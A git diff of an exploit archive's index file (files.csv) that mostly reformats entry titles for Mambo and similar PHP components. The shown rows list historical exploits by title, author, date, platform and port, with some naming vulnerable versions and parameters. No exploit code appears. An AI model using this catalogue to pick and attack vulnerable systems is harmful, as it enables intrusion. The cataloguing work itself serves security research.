diff --git a/files.csv b/files.csv index dc59f29de..24e0859e5 100755 --- a/files.csv +++ b/files.csv @@ -431,7 +431,7 @@ id,file,description,date,author,platform,type,port 558,platforms/windows/local/558.c,"WinRAR 1.0 - Local Buffer Overflow",2004-09-28,ATmaCA,windows,local,0 559,platforms/windows/local/559.c,"Zinf Audio Player 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,windows,local,0 560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros (.mcr) Local",2004-09-28,ATmaCA,windows,local,0 -561,platforms/php/webapps/561.sh,"Serendipity 0.7-beta1 - SQL Injection (PoC)",2004-09-28,aCiDBiTS,php,webapps,0 +561,platforms/php/webapps/561.sh,"S9Y Serendipity 0.7-beta1 - SQL Injection (PoC)",2004-09-28,aCiDBiTS,php,webapps,0 562,platforms/windows/dos/562.c,"MSSQL 7.0 - Remote Denial of Service",2004-09-29,"securma massine",windows,dos,0 565,platforms/php/webapps/565.txt,"Silent Storm Portal - Multiple Vulnerabilities",2004-09-30,"CHT Security Research",php,webapps,0 566,platforms/windows/remote/566.pl,"IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow",2004-10-04,LoWNOISE,windows,remote,80 @@ -758,7 +758,7 @@ id,file,description,date,author,platform,type,port 936,platforms/windows/local/936.c,"DeluxeFtp 6.x - Local Password Disclosure",2005-04-13,Kozan,windows,local,0 937,platforms/windows/local/937.c,"BitComet 0.57 - Local Proxy Password Disclosure",2005-04-13,Kozan,windows,local,0 938,platforms/windows/local/938.cpp,"Microsoft Windows - 'HTA' Script Execution Exploit (MS05-016)",2005-04-14,ZwelL,windows,local,0 -939,platforms/php/webapps/939.pl,"Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0 +939,platforms/php/webapps/939.pl,"S9Y Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0 940,platforms/linux/remote/940.c,"Sumus 0.2.2 - httpd Remote Buffer Overflow",2005-04-14,vade79,linux,remote,81 941,platforms/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service",2005-04-14,"Luigi Auriemma",windows,dos,0 942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0 @@ -1666,8 +1666,8 @@ id,file,description,date,author,platform,type,port 1952,platforms/php/webapps/1952.txt,"THoRCMS 1.3.1 - 'phpbb_root_path' Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0 1953,platforms/php/webapps/1953.pl,"DeluxeBB 1.07 - (cp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 1954,platforms/php/webapps/1954.pl,"DreamAccount 3.1 - (auth.api.php) Remote File Inclusion",2006-06-25,CrAsh_oVeR_rIdE,php,webapps,0 -1955,platforms/php/webapps/1955.txt,"CBSms Mambo Module 1.0 - Remote File Inclusion",2006-06-26,Kw3[R]Ln,php,webapps,0 -1956,platforms/php/webapps/1956.txt,"Pearl For Mambo 1.6 - Multiple Remote File Inclusion",2006-06-27,Kw3[R]Ln,php,webapps,0 +1955,platforms/php/webapps/1955.txt,"Mambo Module CBSms 1.0 - Remote File Inclusion",2006-06-26,Kw3[R]Ln,php,webapps,0 +1956,platforms/php/webapps/1956.txt,"Mambo Component Pearl 1.6 - Multiple Remote File Inclusion",2006-06-27,Kw3[R]Ln,php,webapps,0 1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - (forumid) SQL Injection",2006-06-27,simo64,php,webapps,0 1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 - Hlink Stack/Buffer Overflow (SEH)",2006-06-27,FistFuXXer,windows,local,0 1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Inclusion",2006-06-28,marriottvn,php,webapps,0 @@ -1690,7 +1690,7 @@ id,file,description,date,author,platform,type,port 1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,windows,dos,0 1978,platforms/windows/local/1978.pl,"Microsoft Excel - Universal Hlink Local Buffer Overflow",2006-07-02,"SYS 49152",windows,local,0 1980,platforms/windows/dos/1980.pl,"ImgSvr 0.6.5 - (long http post) Denial of Service",2006-07-04,n00b,windows,dos,0 -1981,platforms/php/webapps/1981.txt,"galleria Mambo Module 1.0b - Remote File Inclusion",2006-07-04,sikunYuk,php,webapps,0 +1981,platforms/php/webapps/1981.txt,"Mambo Module galleria 1.0b - Remote File Inclusion",2006-07-04,sikunYuk,php,webapps,0 1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Inclusion",2006-07-04,OLiBekaS,php,webapps,0 1983,platforms/php/webapps/1983.txt,"MyPHP CMS 0.3 - (domain) Remote File Inclusion",2006-07-05,Kw3[R]Ln,php,webapps,0 1984,platforms/windows/dos/1984.py,"WinRAR 3.60 Beta 6 - (SFX Path) Stack Overflow",2006-07-05,posidron,windows,dos,0 @@ -1703,8 +1703,8 @@ id,file,description,date,author,platform,type,port 1991,platforms/php/webapps/1991.php,"Pivot 1.30 RC2 - Privilege Escalation / Remote Code Execution",2006-07-07,rgod,php,webapps,0 1992,platforms/windows/local/1992.py,"WinRAR 3.60 Beta 6 - (SFX Path) Local Stack Overflow (French)",2006-07-07,"Jerome Athias",windows,local,0 1993,platforms/php/webapps/1993.php,"PAPOO 3_RC3 - SQL Injection / Admin Credentials Disclosure",2006-07-07,rgod,php,webapps,0 -1994,platforms/php/webapps/1994.txt,"SimpleBoard Mambo Component 1.1.0 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0 -1995,platforms/php/webapps/1995.txt,"com_forum Mambo Component 1.2.4RC3 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0 +1994,platforms/php/webapps/1994.txt,"Mambo Component SimpleBoard 1.1.0 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0 +1995,platforms/php/webapps/1995.txt,"Mambo Component com_forum 1.2.4RC3 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0 1996,platforms/php/webapps/1996.txt,"Sabdrimer PRO 2.2.4 - (pluginpath) Remote File Inclusion",2006-07-09,A.nosrati,php,webapps,0 1997,platforms/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)",2006-07-09,joffer,multiple,remote,10000 1998,platforms/php/webapps/1998.pl,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (2)",2006-07-09,"Jacek Wlodarczyk",php,webapps,0 @@ -1729,17 +1729,17 @@ id,file,description,date,author,platform,type,port 2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)",2006-07-15,UmZ,multiple,remote,10000 2018,platforms/php/webapps/2018.txt,"FlushCMS 1.0.0-pre2 - (class.rich.php) Remote File Inclusion",2006-07-16,igi,php,webapps,0 2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod 1.2 - (m2f_root_path) Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0 -2020,platforms/php/webapps/2020.txt,"com_videodb Mambo Component 0.3en - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0 -2021,platforms/php/webapps/2021.txt,"SMF Forum Mambo Component 1.3.1.3 - Include",2006-07-17,ASIANEAGLE,php,webapps,0 -2022,platforms/php/webapps/2022.txt,"com_extcalendar Mambo Component 2.0 - Include",2006-07-17,OLiBekaS,php,webapps,0 -2023,platforms/php/webapps/2023.txt,"com_loudmouth Mambo Component 4.0j - Include",2006-07-17,h4ntu,php,webapps,0 -2024,platforms/php/webapps/2024.txt,"pc_cookbook Mambo Component 0.3 - Include",2006-07-17,Matdhule,php,webapps,0 -2025,platforms/php/webapps/2025.txt,"perForms Mambo Component 1.0 - Remote File Inclusion",2006-07-17,endeneu,php,webapps,0 -2026,platforms/php/webapps/2026.txt,"com_hashcash Mambo Component 1.2.1 - Include",2006-07-17,Matdhule,php,webapps,0 -2027,platforms/php/webapps/2027.txt,"HTMLArea3 Mambo Module 1.5 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 -2028,platforms/php/webapps/2028.txt,"Sitemap Mambo Component 2.0.0 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 -2029,platforms/php/webapps/2029.txt,"pollxt Mambo Component 1.22.07 - Remote File Inclusion",2006-07-17,vitux,php,webapps,0 -2030,platforms/php/webapps/2030.txt,"MiniBB Mambo Component 1.5a - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 +2020,platforms/php/webapps/2020.txt,"Mambo Component com_videodb 0.3en - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0 +2021,platforms/php/webapps/2021.txt,"Mambo Component SMF Forum 1.3.1.3 - Remote File Inclusion",2006-07-17,ASIANEAGLE,php,webapps,0 +2022,platforms/php/webapps/2022.txt,"Mambo Component 'com_extcalendar' 2.0 - Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0 +2023,platforms/php/webapps/2023.txt,"Mambo Component com_loudmouth 4.0j - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0 +2024,platforms/php/webapps/2024.txt,"Mambo Component pc_cookbook 0.3 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 +2025,platforms/php/webapps/2025.txt,"Mambo Component perForms 1.0 - Remote File Inclusion",2006-07-17,endeneu,php,webapps,0 +2026,platforms/php/webapps/2026.txt,"Mambo Component com_hashcash 1.2.1 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 +2027,platforms/php/webapps/2027.txt,"Mambo Module HTMLArea3 1.5 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 +2028,platforms/php/webapps/2028.txt,"Mambo Component Sitemap 2.0.0 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 +2029,platforms/php/webapps/2029.txt,"Mambo Component pollxt 1.22.07 - Remote File Inclusion",2006-07-17,vitux,php,webapps,0 +2030,platforms/php/webapps/2030.txt,"Mambo Component MiniBB 1.5a - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'logrotate prctl()' Privilege Escalation",2006-07-18,"Marco Ivaldi",linux,local,0 2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Blind SQL Injection",2006-07-18,"Jacek Wlodarczyk",php,webapps,0 2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection (2)",2006-07-18,"w4g.not null",php,webapps,0 @@ -1763,14 +1763,14 @@ id,file,description,date,author,platform,type,port 2059,platforms/hardware/dos/2059.cpp,"D-Link Router - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,hardware,dos,0 2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - (help.php) Remote File Inclusion",2006-07-23,magnific,php,webapps,0 2061,platforms/multiple/remote/2061.txt,"Apache Tomcat < 5.5.17 - Remote Directory Listing",2006-07-23,"ScanAlert Security",multiple,remote,0 -2062,platforms/php/webapps/2062.txt,"MoSpray Mambo Component 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0 +2062,platforms/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0 2063,platforms/php/webapps/2063.txt,"ArticlesOne 07232006 - (page) Remote File Inclusion",2006-07-23,CyberLord,php,webapps,0 -2064,platforms/php/webapps/2064.txt,"Mam-Moodle Mambo Component alpha - Remote File Inclusion",2006-07-23,jank0,php,webapps,0 +2064,platforms/php/webapps/2064.txt,"Mambo Component Mam-Moodle alpha - Remote File Inclusion",2006-07-23,jank0,php,webapps,0 2065,platforms/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)",2006-07-23,"Luigi Auriemma",windows,local,0 -2066,platforms/php/webapps/2066.txt,"multibanners Mambo Component 1.0.1 - Remote File Inclusion",2006-07-23,Blue|Spy,php,webapps,0 +2066,platforms/php/webapps/2066.txt,"Mambo Component multibanners 1.0.1 - Remote File Inclusion",2006-07-23,Blue|Spy,php,webapps,0 2067,platforms/solaris/local/2067.c,"Solaris 10 sysinfo() - Local Kernel Memory Disclosure",2006-07-24,prdelka,solaris,local,0 2068,platforms/php/webapps/2068.php,"X7 Chat 2.0.4 - (old_prefix) Blind SQL Injection",2006-07-24,rgod,php,webapps,0 -2069,platforms/php/webapps/2069.txt,"PrinceClan Chess Mambo Com 0.8 - Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 +2069,platforms/php/webapps/2069.txt,"Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi - (CSeq) Remote Buffer Overflow",2006-07-24,"Jacopo Cervini",windows,remote,5060 2071,platforms/php/webapps/2071.php,"Etomite CMS 0.6.1 - 'Username' SQL Injection (mq = off)",2006-07-25,rgod,php,webapps,0 2072,platforms/php/webapps/2072.php,"Etomite CMS 0.6.1 - (rfiles.php) Remote Command Execution",2006-07-25,rgod,php,webapps,0 @@ -1779,18 +1779,18 @@ id,file,description,date,author,platform,type,port 2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager - Remote Buffer Overflow (2) (Metasploit)",2006-07-26,ri0t,windows,remote,0 2076,platforms/windows/remote/2076.pl,"AIM Triton 1.0.4 - (SipXtapi) Remote Buffer Overflow (PoC)",2006-07-26,c0rrupt,windows,remote,5061 2077,platforms/php/webapps/2077.txt,"WMNews 0.2a - (base_datapath) Remote File Inclusion",2006-07-27,uNfz,php,webapps,0 -2078,platforms/php/webapps/2078.txt,"a6mambohelpdesk Mambo Component 18RC1 - Include",2006-07-27,Dr.Jr7,php,webapps,0 +2078,platforms/php/webapps/2078.txt,"Mambo Component 'com_a6mambohelpdesk' 18RC1 - Remote File Inclusion",2006-07-27,Dr.Jr7,php,webapps,0 2079,platforms/windows/remote/2079.pl,"eIQnetworks ESA - (Syslog Server) Remote Buffer Overflow",2006-07-27,"Kevin Finisterre",windows,remote,12345 2080,platforms/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)",2006-07-27,"Kevin Finisterre",windows,remote,10616 2081,platforms/php/webapps/2081.txt,"Portail PHP 1.7 - (chemin) Remote File Inclusion",2006-07-27,"Mehmet Ince",php,webapps,0 2082,platforms/multiple/remote/2082.html,"Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution (PoC)",2006-07-28,"H D Moore",multiple,remote,0 -2083,platforms/php/webapps/2083.txt,"Mambo Security Images Component 3.0.5 - Inclusion",2006-07-28,Drago84,php,webapps,0 -2084,platforms/php/webapps/2084.txt,"Mambo MGM Component 0.95r2 - Remote File Inclusion",2006-07-28,"A-S-T TEAM",php,webapps,0 -2085,platforms/php/webapps/2085.txt,"Mambo Colophon Component 1.2 - Remote File Inclusion",2006-07-29,Drago84,php,webapps,0 -2086,platforms/php/webapps/2086.txt,"Mambo mambatStaff Component 3.1b - Remote File Inclusion",2006-07-29,Dr.Jr7,php,webapps,0 +2083,platforms/php/webapps/2083.txt,"Mambo Component Security Images 3.0.5 - Inclusion",2006-07-28,Drago84,php,webapps,0 +2084,platforms/php/webapps/2084.txt,"Mambo Component MGM 0.95r2 - Remote File Inclusion",2006-07-28,"A-S-T TEAM",php,webapps,0 +2085,platforms/php/webapps/2085.txt,"Mambo Component 'com_colophon' 1.2 - Remote File Inclusion",2006-07-29,Drago84,php,webapps,0 +2086,platforms/php/webapps/2086.txt,"Mambo Component mambatStaff 3.1b - Remote File Inclusion",2006-07-29,Dr.Jr7,php,webapps,0 2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 - 'cookie' Remote Code Execution",2006-07-29,r00t,php,webapps,0 2088,platforms/php/webapps/2088.php,"ATutor 1.5.3.1 - 'links' Blind SQL Injection",2006-07-30,rgod,php,webapps,0 -2089,platforms/php/webapps/2089.txt,"Mambo User Home Pages Component 0.5 - Remote File Inclusion",2006-07-30,"Kurdish Security",php,webapps,0 +2089,platforms/php/webapps/2089.txt,"Mambo Component User Home Pages 0.5 - Remote File Inclusion",2006-07-30,"Kurdish Security",php,webapps,0 2090,platforms/php/webapps/2090.txt,"Joomla! Component com_bayesiannaivefilter 1.1 - Inclusion",2006-07-30,Pablin77,php,webapps,0 2091,platforms/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 - Local Code Execution (French)",2006-07-30,NSRocket,windows,local,0 2092,platforms/php/webapps/2092.txt,"Joomla! Component LMO 1.0b2 - Remote File Inclusion",2006-07-30,vitux,php,webapps,0 @@ -1870,7 +1870,7 @@ id,file,description,date,author,platform,type,port 2169,platforms/php/webapps/2169.txt,"Chaussette 080706 - (_BASE) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 2170,platforms/php/webapps/2170.txt,"VWar 1.50 R14 - (online.php) SQL Injection",2006-08-10,brOmstar,php,webapps,0 2171,platforms/php/webapps/2171.txt,"WEBInsta MM 1.3e - (cabsolute_path) Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 -2172,platforms/php/webapps/2172.txt,"Mambo Remository Component 3.25 - Remote File Inclusion",2006-08-10,camino,php,webapps,0 +2172,platforms/php/webapps/2172.txt,"Mambo Component Remository 3.25 - Remote File Inclusion",2006-08-10,camino,php,webapps,0 2173,platforms/php/webapps/2173.txt,"MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 2174,platforms/php/webapps/2174.txt,"Wheatblog 1.1 - (session.php) Remote File Inclusion",2006-08-11,O.U.T.L.A.W,php,webapps,80 2175,platforms/php/webapps/2175.txt,"WEBInsta CMS 0.3.1 - (templates_dir) Remote File Inclusion",2006-08-12,K-159,php,webapps,0 @@ -1880,9 +1880,9 @@ id,file,description,date,author,platform,type,port 2179,platforms/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,multiple,dos,0 2180,platforms/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,multiple,dos,0 2181,platforms/php/webapps/2181.pl,"PHPay 2.02 - (nu_mail.inc.php) Remote mail() Injection",2006-08-14,beford,php,webapps,80 -2182,platforms/php/webapps/2182.txt,"Mambo mmp Component 1.2 - Remote File Inclusion",2006-08-14,mdx,php,webapps,0 +2182,platforms/php/webapps/2182.txt,"Mambo Component MMP 1.2 - Remote File Inclusion",2006-08-14,mdx,php,webapps,0 2183,platforms/php/webapps/2183.txt,"ProjectButler 0.8.4 - (rootdir) Remote File Inclusion",2006-08-14,"the master",php,webapps,0 -2184,platforms/php/webapps/2184.txt,"Mambo Peoplebook Component 1.0 - Remote File Inclusion",2006-08-14,Matdhule,php,webapps,0 +2184,platforms/php/webapps/2184.txt,"Mambo Component Peoplebook 1.0 - Remote File Inclusion",2006-08-14,Matdhule,php,webapps,0 2185,platforms/linux/remote/2185.pl,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow (3)",2006-08-14,K-sPecial,linux,remote,110 2186,platforms/asp/webapps/2186.txt,"Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (1)",2006-08-14,ASIANEAGLE,asp,webapps,0 2187,platforms/php/webapps/2187.htm,"WEBInsta MM 1.3e - 'absolute_path' Remote File Inclusion",2006-08-15,str0ke,php,webapps,0 @@ -1894,35 +1894,35 @@ id,file,description,date,author,platform,type,port 2193,platforms/linux/local/2193.php,"PHP 4.4.3 / 5.1.4 - (sscanf) Local Buffer Overflow",2006-08-16,Andi,linux,local,0 2194,platforms/windows/dos/2194.pl,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (1)",2006-08-16,Preddy,windows,dos,0 2195,platforms/windows/dos/2195.html,"VMware 5.5.1 - COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0 -2196,platforms/php/webapps/2196.txt,"Mambo CopperminePhotoGalery Component - Remote File Inclusion",2006-08-16,k1tk4t,php,webapps,0 +2196,platforms/php/webapps/2196.txt,"Mambo Component CopperminePhotoGalery - Remote File Inclusion",2006-08-16,k1tk4t,php,webapps,0 2198,platforms/php/webapps/2198.php,"CubeCart 3.0.11 - (oid) Blind SQL Injection",2006-08-17,rgod,php,webapps,0 2199,platforms/php/webapps/2199.txt,"IRSR 0.2 - (_sysSessionPath) Remote File Inclusion",2006-08-17,Kacper,php,webapps,0 2200,platforms/php/webapps/2200.txt,"WTcom 0.2.4-alpha - (torrents.php) SQL Injection",2006-08-17,sh1r081,php,webapps,0 2201,platforms/php/webapps/2201.txt,"POWERGAP 2003 - 's0x.php' Remote File Inclusion",2006-08-17,"Saudi Hackrz",php,webapps,0 -2202,platforms/php/webapps/2202.txt,"Mambo mambelfish Component 1.1 - Remote File Inclusion",2006-08-17,mdx,php,webapps,0 +2202,platforms/php/webapps/2202.txt,"Mambo Component mambelfish 1.1 - Remote File Inclusion",2006-08-17,mdx,php,webapps,0 2203,platforms/php/webapps/2203.txt,"Joomla! Component com_jim 1.0.1 - Remote File Inclusion",2006-08-17,"Mehmet Ince",php,webapps,0 2204,platforms/windows/dos/2204.c,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (3)",2006-08-17,Preddy,windows,dos,0 2205,platforms/php/webapps/2205.txt,"Joomla! Component Mosets Tree 1.0 - Remote File Inclusion",2006-08-17,Crackers_Child,php,webapps,0 -2206,platforms/php/webapps/2206.txt,"Mambo phpShop Component 1.2 RC2b - File Inclusion",2006-08-17,Cmaster4,php,webapps,0 -2207,platforms/php/webapps/2207.txt,"Mambo a6mambocredits Component 1.0.0 - File Inclusion",2006-08-17,Cmaster4,php,webapps,0 +2206,platforms/php/webapps/2206.txt,"Mambo Component 'com_phpshop' 1.2 RC2b - File Inclusion",2006-08-17,Cmaster4,php,webapps,0 +2207,platforms/php/webapps/2207.txt,"Mambo Component 'com_a6mambocredits' 1.0.0 - File Inclusion",2006-08-17,Cmaster4,php,webapps,0 2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - (IE Plugin) Remote Denial of Service Crash",2006-08-18,Mr.Niega,windows,dos,0 2209,platforms/php/webapps/2209.txt,"Joomla! Component Artlinks 1.0b4 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 2210,platforms/windows/dos/2210.c,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (2)",2006-08-18,vegas78,windows,dos,0 2211,platforms/php/webapps/2211.txt,"PHlyMail Lite 3.4.4 - (mod.listmail.php) Remote File Inclusion",2006-08-18,Kacper,php,webapps,0 2212,platforms/php/webapps/2212.txt,"phpCodeGenie 3.0.2 - (BEAUT_PATH) Remote File Inclusion",2006-08-18,Kacper,php,webapps,0 -2213,platforms/php/webapps/2213.txt,"Mambo MamboWiki Component 0.9.6 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 +2213,platforms/php/webapps/2213.txt,"Mambo Component MamboWiki 0.9.6 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 2214,platforms/php/webapps/2214.txt,"Joomla! Component Link Directory 1.0.3 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 2215,platforms/php/webapps/2215.txt,"Joomla! Component Kochsuite 0.9.4 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 2216,platforms/php/webapps/2216.txt,"Sonium Enterprise Adressbook 0.2 - (folder) Include",2006-08-18,"Philipp Niedziela",php,webapps,0 -2217,platforms/php/webapps/2217.txt,"Mambo cropimage Component 1.0 - Remote File Inclusion",2006-08-19,"Mehmet Ince",php,webapps,0 +2217,platforms/php/webapps/2217.txt,"Mambo Component cropimage 1.0 - Remote File Inclusion",2006-08-19,"Mehmet Ince",php,webapps,0 2218,platforms/php/webapps/2218.txt,"interact 2.2 - (CONFIG[base_path]) Remote File Inclusion",2006-08-19,Kacper,php,webapps,0 2219,platforms/php/webapps/2219.php,"Joomla! Component Poll 1.0.10 - Arbitrary Add Votes Exploit",2006-08-19,trueend5,php,webapps,0 2220,platforms/php/webapps/2220.txt,"Tutti Nova 1.6 - (TNLIB_DIR) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 2221,platforms/php/webapps/2221.txt,"Fantastic News 2.1.3 - (script_path) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 -2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component 0.6b - Include",2006-08-19,mdx,php,webapps,0 +2222,platforms/php/webapps/2222.txt,"Mambo Component com_lurm_constructor 0.6b - Remote File Inclusion",2006-08-19,mdx,php,webapps,0 2223,platforms/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139 2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat 3.1 - 'adminlog' Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 -2225,platforms/php/webapps/2225.txt,"mambo com_babackup Component 1.1 - File Inclusion",2006-08-19,mdx,php,webapps,0 +2225,platforms/php/webapps/2225.txt,"Mambo Component com_babackup 1.1 - File Inclusion",2006-08-19,mdx,php,webapps,0 2226,platforms/php/webapps/2226.txt,"NES Game and NES System c108122 - File Inclusion",2006-08-20,Kacper,php,webapps,0 2227,platforms/php/webapps/2227.txt,"SportsPHool 1.0 - (mainnav) Remote File Inclusion",2006-08-20,Kacper,php,webapps,0 2228,platforms/asp/webapps/2228.txt,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)",2006-08-20,"Chironex Fleckeri",asp,webapps,0 @@ -2064,7 +2064,7 @@ id,file,description,date,author,platform,type,port 2364,platforms/php/webapps/2364.txt,"KnowledgeBuilder 2.2 - (visEdit_root) Remote File Inclusion",2006-09-13,igi,php,webapps,0 2365,platforms/php/webapps/2365.txt,"Newsscript 0.5 - Remote File Inclusion / Local File Inclusion",2006-09-13,"Daftrix Security",php,webapps,0 2366,platforms/php/webapps/2366.txt,"phpQuiz 0.1 - (pagename) Remote File Inclusion",2006-09-14,Solpot,php,webapps,0 -2367,platforms/php/webapps/2367.txt,"Mambo com_serverstat Component 0.4.4 - File Inclusion",2006-09-14,"Mehmet Ince",php,webapps,0 +2367,platforms/php/webapps/2367.txt,"Mambo Component com_serverstat 0.4.4 - File Inclusion",2006-09-14,"Mehmet Ince",php,webapps,0 2368,platforms/php/webapps/2368.txt,"TeamCal Pro 2.8.001 - (app_root) Remote File Inclusion",2006-09-14,PSYCH@,php,webapps,0 2369,platforms/php/webapps/2369.txt,"PhotoPost 4.6 - (PP_PATH) Remote File Inclusion",2006-09-15,"Saudi Hackrz",php,webapps,0 2370,platforms/php/webapps/2370.php,"Limbo CMS 1.0.4.2L - (com_contact) Remote Code Execution",2006-09-15,rgod,php,webapps,0 @@ -2072,11 +2072,11 @@ id,file,description,date,author,platform,type,port 2372,platforms/php/webapps/2372.txt,"BolinOS 4.5.5 - (gBRootPath) Remote File Inclusion",2006-09-15,"Mehmet Ince",php,webapps,0 2373,platforms/php/webapps/2373.txt,"PHP DocWriter 0.3 - (script) Remote File Inclusion",2006-09-15,Kacper,php,webapps,0 2374,platforms/php/webapps/2374.pl,"Site@School 2.4.02 - Arbitrary File Upload",2006-09-15,simo64,php,webapps,0 -2375,platforms/php/webapps/2375.txt,"Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Include",2006-09-15,3l3ctric-Cracker,php,webapps,0 +2375,platforms/php/webapps/2375.txt,"Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Remote File Inclusion",2006-09-15,3l3ctric-Cracker,php,webapps,0 2376,platforms/php/webapps/2376.pl,"phpQuiz 0.1.2 - SQL Injection / Code Execution",2006-09-16,simo64,php,webapps,0 2377,platforms/php/webapps/2377.txt,"aeDating 4.1 - dir[inc] Remote File Inclusion",2006-09-16,NeXtMaN,php,webapps,0 2378,platforms/php/webapps/2378.php,"GNUTURK 2G - (t_id) SQL Injection",2006-09-16,p2y,php,webapps,0 -2379,platforms/php/webapps/2379.txt,"Mambo com_registration_detailed 4.1 - Remote File Inclusion",2006-09-16,k1tk4t,php,webapps,0 +2379,platforms/php/webapps/2379.txt,"Mambo Component com_registration_detailed 4.1 - Remote File Inclusion",2006-09-16,k1tk4t,php,webapps,0 2380,platforms/php/webapps/2380.txt,"UNAK-CMS 1.5 - (dirroot) Remote File Inclusion",2006-09-16,SHiKaA,php,webapps,0 2381,platforms/php/webapps/2381.txt,"guanxiCRM Business Solution 0.9.1 - Remote File Inclusion",2006-09-16,SHiKaA,php,webapps,0 2382,platforms/php/webapps/2382.pl,"Zix Forum 1.12 - 'RepId' SQL Injection (2)",2006-09-17,SlimTim10,php,webapps,0 @@ -2308,7 +2308,7 @@ id,file,description,date,author,platform,type,port 2609,platforms/php/webapps/2609.txt,"Open Meetings Filing Application - Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps,0 2611,platforms/php/webapps/2611.txt,"Trawler Web CMS 1.8.1 - Multiple Remote File Inclusion",2006-10-21,k1tk4t,php,webapps,0 2612,platforms/php/webapps/2612.txt,"PGOSD - 'misc/function.php3' Remote File Inclusion",2006-10-22,"Mehmet Ince",php,webapps,0 -2613,platforms/php/webapps/2613.txt,"MambWeather Mambo Module 1.8.1 - Remote File Inclusion",2006-10-22,h4ntu,php,webapps,0 +2613,platforms/php/webapps/2613.txt,"Mambo Module MambWeather 1.8.1 - Remote File Inclusion",2006-10-22,h4ntu,php,webapps,0 2614,platforms/php/webapps/2614.txt,"Net_DNS 0.3 - (DNS/RR.php) Remote File 